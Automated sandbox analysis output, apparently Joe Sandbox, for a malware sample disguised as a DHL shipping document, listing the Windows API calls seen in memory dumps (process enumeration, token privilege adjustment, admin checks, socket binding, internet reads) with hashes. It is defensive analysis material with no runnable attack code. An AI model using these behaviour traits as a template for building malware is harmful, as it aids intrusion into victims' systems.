                                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00946B13
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00946B20
                                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00946B34
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                  • String ID:
                                                                                  • API String ID: 99427753-0
                                                                                  • Opcode ID: fa2368ca6c56da870a88eb24d4cc7fe8ebae59983c6c9ac503753dddda2e8467
                                                                                  • Instruction ID: f51def1013c581f8cf17604f845ca88ca58eeaa15878c3104d8282eed46c712b
                                                                                  • Opcode Fuzzy Hash: fa2368ca6c56da870a88eb24d4cc7fe8ebae59983c6c9ac503753dddda2e8467
                                                                                  • Instruction Fuzzy Hash: E541D775740210AFEB10BF28DC86F6E77A9EB45720F04815EF956EB3C2DA705D008B92
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                  • String ID:
                                                                                  • API String ID: 292994002-0
                                                                                  • Opcode ID: da1a48f3bb720c6b0d4ad77ba99bd88fbd9f57314301d0545feea4f4fabf05e4
                                                                                  • Instruction ID: f8e7b93c5d05f2fc18daf6d74174b1d7e79f7afd0e4ae5168ec2a7d5d8b64d7b
                                                                                  • Opcode Fuzzy Hash: da1a48f3bb720c6b0d4ad77ba99bd88fbd9f57314301d0545feea4f4fabf05e4
                                                                                  • Instruction Fuzzy Hash: 2111B6323026606FD7119F27DC64B2F7B9CFF44722B824429F846D7242DB309905CB95
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00911D88,?), ref: 0094C312
                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0094C324
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                  • API String ID: 2574300362-1816364905
                                                                                  • Opcode ID: 04bbea7b59cae4539c13c4d4f5039beda11e9184a1bba1acc961bc5eedd94e88
                                                                                  • Instruction ID: 0b1ef49272448a6c3f9056a89884fddd01514564e5fcfcc46e34afae58b85b37
                                                                                  • Opcode Fuzzy Hash: 04bbea7b59cae4539c13c4d4f5039beda11e9184a1bba1acc961bc5eedd94e88
                                                                                  • Instruction Fuzzy Hash: C4E012B4615713CFDB705F26D814E4676D8EF4976AF80C439E899D66A0E770E840CB60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: __itow__swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 674341424-0
                                                                                  • Opcode ID: 4bacdfce8c9dd8984dd60fe37797fe282670451c3d406b980987ac18fd2f7f26
                                                                                  • Instruction ID: b2aa45701d88ed7e9c5f9953320790b0ebe58cf1e6ed23495a45b1996d6211d3
                                                                                  • Opcode Fuzzy Hash: 4bacdfce8c9dd8984dd60fe37797fe282670451c3d406b980987ac18fd2f7f26
                                                                                  • Instruction Fuzzy Hash: C32264716083459BC724DF68C885BAAB7E4FF85314F104A2DF99A97391DB30EE44CB92
                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 0094F151
                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0094F15F
                                                                                    • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 0094F21F
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0094F22E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 2576544623-0
                                                                                  • Opcode ID: ab071832d20d6c5215a7e3b7e330d01d724f3ec10f0797641de91f40e5540927
                                                                                  • Instruction ID: 08d7baee105a5bd811e6b124dd0b1fdf2e37a10c5d942d2478bed047204fe964
                                                                                  • Opcode Fuzzy Hash: ab071832d20d6c5215a7e3b7e330d01d724f3ec10f0797641de91f40e5540927
                                                                                  • Instruction Fuzzy Hash: 5E514971508711AFD310EF24D895E6BBBE8FF98710F14492EF495D72A1EB70A904CB92
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 009340D1
                                                                                  • _memset.LIBCMT ref: 009340F2
                                                                                  • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00934144
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0093414D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                  • String ID:
                                                                                  • API String ID: 1157408455-0
                                                                                  • Opcode ID: c40e67df592eddf810a580ea3b4ee294d4a5cc6604431057ad617d9ad9b034eb
                                                                                  • Instruction ID: 96004b5c32d24a6af1999dddb554284eab8341cef5b755725e5aa192ef6f8188
                                                                                  • Opcode Fuzzy Hash: c40e67df592eddf810a580ea3b4ee294d4a5cc6604431057ad617d9ad9b034eb
                                                                                  • Instruction Fuzzy Hash: DA11E7759013287AE7309BA5AC4DFABBB7CEF44760F1041AAF908E7180D6744E808BA4
                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0092EB19
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen
                                                                                  • String ID: ($|
                                                                                  • API String ID: 1659193697-1631851259
                                                                                  • Opcode ID: ed8e8784b394676b06fa58a9b8f90705f38286ecbb4aec9c6cd4b3ac94debc68
                                                                                  • Instruction ID: b3123e56bac689f4fcf83506996231539b991a8b13d88ba417242597b4a68e86
                                                                                  • Opcode Fuzzy Hash: ed8e8784b394676b06fa58a9b8f90705f38286ecbb4aec9c6cd4b3ac94debc68
                                                                                  • Instruction Fuzzy Hash: A0324775A007159FDB28CF29D481A6AB7F0FF48320B15C56EE89ADB3A5DB70E941CB40
                                                                                  APIs
                                                                                  • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00941AFE,00000000), ref: 009426D5
                                                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0094270C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                                                  • String ID:
                                                                                  • API String ID: 599397726-0
                                                                                  • Opcode ID: dcd3faecf8bb259f6e29b97626b43f6d8e9c92fd294693db54a4102dfa18c868
                                                                                  • Instruction ID: d7be72ec2f1b617d375c5e50b1a0aba7bb1d065bde0f22d77ab8d89fcde2c170
                                                                                  • Opcode Fuzzy Hash: dcd3faecf8bb259f6e29b97626b43f6d8e9c92fd294693db54a4102dfa18c868
                                                                                  • Instruction Fuzzy Hash: 5041E271904309BFEB20DF94CC85EBBB7BCFB40728F50406AFA01A6141EA71AE419B64
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0093B5AE
                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0093B608
                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0093B655
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                  • String ID:
                                                                                  • API String ID: 1682464887-0
                                                                                  • Opcode ID: 678b2d036f3d9d448626b78e673b3fe80a3e4f52dbfb40ed59084baa27411e5c
                                                                                  • Instruction ID: 86f31f80d6015790b5689e1a770527982cfe02e234c10e4ab63afcd2ac99e672
                                                                                  • Opcode Fuzzy Hash: 678b2d036f3d9d448626b78e673b3fe80a3e4f52dbfb40ed59084baa27411e5c
                                                                                  • Instruction Fuzzy Hash: FB217135A10618EFCB00EFA5D891EADBBB8FF48314F1480AAE945EB351DB31A915CF51
                                                                                  APIs
                                                                                    • Part of subcall function 008F0FF6: std::exception::exception.LIBCMT ref: 008F102C
                                                                                    • Part of subcall function 008F0FF6: __CxxThrowException@8.LIBCMT ref: 008F1041
                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00928D0D
                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00928D3A
                                                                                  • GetLastError.KERNEL32 ref: 00928D47
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                  • String ID:
                                                                                  • API String ID: 1922334811-0
                                                                                  • Opcode ID: b8421da2058bdb50534872bc80ea3981fb9e4b5bcf602f99fefec590d9b8967f
                                                                                  • Instruction ID: d63dff2b57d87f31b1df164f65a50746ca513552b52ef497791bff4706ef4f06
                                                                                  • Opcode Fuzzy Hash: b8421da2058bdb50534872bc80ea3981fb9e4b5bcf602f99fefec590d9b8967f
                                                                                  • Instruction Fuzzy Hash: 6E1160B1414209AFD728DF68EC85D6BB7BCFB44721B24852EF45593685EF30A8448B60
                                                                                  APIs
                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00934C2C
                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00934C43
                                                                                  • FreeSid.ADVAPI32(?), ref: 00934C53
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                  • String ID:
                                                                                  • API String ID: 3429775523-0
                                                                                  • Opcode ID: 54ea15a62d73d5321659e10fba1ee1241ae2d83d8b11b13265e20e551f45f951
                                                                                  • Instruction ID: eaf7e735263a1f50a15d825458d66b3e048c5e608426f96a925e32cc5ca147e0
                                                                                  • Opcode Fuzzy Hash: 54ea15a62d73d5321659e10fba1ee1241ae2d83d8b11b13265e20e551f45f951
                                                                                  • Instruction Fuzzy Hash: E1F04975A1130CBFDF04DFF1DC99AAEBBBCEF08311F0044A9A902E2181E6706A049B50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Variable must be of type 'Object'.$X&
                                                                                  • API String ID: 0-472527329
                                                                                  • Opcode ID: 8c5c3d6911f4923f644a91402f988d124f8b6faf33e8dc4decaa7318970410a8
                                                                                  • Instruction ID: 26d40d1534554d6b9181985715fe3d1c9cb30b9d4dda2c3d70b415465c441fc4
                                                                                  • Opcode Fuzzy Hash: 8c5c3d6911f4923f644a91402f988d124f8b6faf33e8dc4decaa7318970410a8
                                                                                  • Instruction Fuzzy Hash: EAA28D74A04219DFCB24DF58C480AADB7B2FF58314F24866AE916EF351D730AD82DB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7aa88ec7783d74ef9b27a34bafeff0fee2c9a22413769249b9639b58ea80f8a5
                                                                                  • Instruction ID: a5eaeb5508531c576f4210f8ff0ad30e4f000e805d4fad765b03f238187d0d1c
                                                                                  • Opcode Fuzzy Hash: 7aa88ec7783d74ef9b27a34bafeff0fee2c9a22413769249b9639b58ea80f8a5
                                                                                  • Instruction Fuzzy Hash: 15228E74A00219DFDB24EF68C480ABEB7B5FF04310F14866AE956DB351E734A985CB91
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0093C966
                                                                                  • FindClose.KERNEL32(00000000), ref: 0093C996
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$CloseFileFirst
                                                                                  • String ID:
                                                                                  • API String ID: 2295610775-0
                                                                                  • Opcode ID: f75aa2e31a99ea19af35574a68cbecafbc62e33fe4116ca9a10c1a8bb70c8756
                                                                                  • Instruction ID: cb094adcd6b06a84d7f78a96056096d1a80072f6667d026b3bc5b104ce052b56
                                                                                  • Opcode Fuzzy Hash: f75aa2e31a99ea19af35574a68cbecafbc62e33fe4116ca9a10c1a8bb70c8756
                                                                                  • Instruction Fuzzy Hash: D01161726146109FD710EF29D855A2AF7E9FF84325F018A1EF9A9D73A1DB34AC00CB81
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0094977D,?,0095FB84,?), ref: 0093A302
                                                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0094977D,?,0095FB84,?), ref: 0093A314
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFormatLastMessage
                                                                                  • String ID:
                                                                                  • API String ID: 3479602957-0
                                                                                  • Opcode ID: d33834564ef357acc022fad35199d3ddf335a2cfec818f7e2efa1005e4998644
                                                                                  • Instruction ID: eacc73c500e6d946b4bb10581e9eca141aec155abb0a657bebeaec6e67dcfd40
                                                                                  • Opcode Fuzzy Hash: d33834564ef357acc022fad35199d3ddf335a2cfec818f7e2efa1005e4998644
                                                                                  • Instruction Fuzzy Hash: 22F0823555932DABEB20AFA4CC48FEA776DFF08761F004266B919D7181DA309940CBA1
                                                                                  APIs
                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00928851), ref: 00928728
                                                                                  • CloseHandle.KERNEL32(?,?,00928851), ref: 0092873A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                                  • String ID:
                                                                                  • API String ID: 81990902-0
                                                                                  • Opcode ID: 12a346186ed89559270b3a97f780d6674fc582b76c45ef1e5b11fb861a795caa
                                                                                  • Instruction ID: ed20e07e4eb3e798a069f412269461c3b54e3e363ffecea2f52a0d08241a6a52
                                                                                  • Opcode Fuzzy Hash: 12a346186ed89559270b3a97f780d6674fc582b76c45ef1e5b11fb861a795caa
                                                                                  • Instruction Fuzzy Hash: 1AE0B676015A10EEEB252B65EC09D777BADFB443617248829F596C0470DB72AC90EB10
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,008F8F97,?,?,?,00000001), ref: 008FA39A
                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 008FA3A3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: 41092d3f23a7102f245b5c6d905953c8fd49fb3f3f3d9e6fca8a7806066e07e3
                                                                                  • Instruction ID: 328893d15005c77b136d064f12a613d9be7f6f304b4378d551a5dc8d77e7cc4e
                                                                                  • Opcode Fuzzy Hash: 41092d3f23a7102f245b5c6d905953c8fd49fb3f3f3d9e6fca8a7806066e07e3
                                                                                  • Instruction Fuzzy Hash: BFB09231068308ABEA002F92ED19B893F68EB44BF3F404020F60D84070CB725450AB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
